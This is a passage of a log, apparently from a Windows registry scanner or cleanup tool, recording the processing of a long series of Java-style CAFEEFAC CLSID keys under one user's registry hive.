[2016.10.18 21:01:31.257] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0056-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.258] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0057-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.258] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0057-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.258] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0057-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.258] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0058-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.258] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0058-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.258] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0058-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.258] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0059-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.258] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0059-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.258] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0059-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.258] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0060-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.258] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0060-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.259] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0060-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.259] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0061-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.259] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0061-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.259] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0061-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.259] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0062-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.259] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0062-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.259] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0062-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.259] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0063-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.259] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0063-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.259] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0063-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.259] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0064-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.260] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0064-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.260] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0064-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.260] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0065-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.260] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0065-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.260] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0065-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.260] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0066-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.260] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0066-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.260] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0066-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.260] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0067-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.260] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0067-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.260] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0067-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.260] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0068-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.260] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0068-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.260] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0068-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.261] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0069-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.261] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0069-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.261] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0069-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.261] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0070-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.261] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0070-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.261] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0070-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.261] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0071-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.261] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0071-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.261] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0071-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.261] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0072-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.261] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0072-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.261] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0072-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.261] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0073-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.262] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0073-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.262] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0073-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.262] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0074-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.262] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0074-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.262] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0074-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.262] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0075-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.262] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0075-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.262] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0075-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.262] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0076-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.262] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0076-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.262] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0076-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.262] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0077-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.262] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0077-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.262] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0077-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.263] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0078-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.263] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0078-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.263] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0078-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.263] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0079-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.263] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0079-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.263] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0079-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.263] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0080-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.263] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0080-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.263] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0080-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.263] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0081-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.263] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0081-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.263] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0081-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.263] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0082-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.263] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0082-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.263] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0082-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.263] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0083-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.264] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0083-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.264] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0083-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.264] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0084-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.264] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0084-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.264] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0084-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.264] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0085-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.264] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0085-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.264] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0085-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.264] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0086-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.264] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0086-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.265] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0086-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.265] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0087-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.265] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0087-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.265] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0087-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.265] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0088-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.265] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0088-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.265] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0088-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.265] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0089-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.265] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0089-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.266] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0089-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.266] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0090-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.266] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0090-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.266] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0090-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.266] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0091-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.266] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0091-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.266] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0091-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.266] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-FFFF-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.266] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0000-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.266] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0000-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.266] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0000-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.267] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0001-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.267] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0001-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.267] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0001-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.267] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0002-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.267] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0002-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.267] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0002-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.267] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0003-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.267] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0003-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.267] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0003-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.267] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0004-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.267] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0004-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.268] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0004-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.268] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0005-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.268] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0005-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.268] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0005-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.268] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0006-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.268] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0006-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.268] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0006-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.268] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0007-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.268] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0007-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.268] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0007-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.268] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0008-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.269] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0008-ABCDEFFEDCBB}]
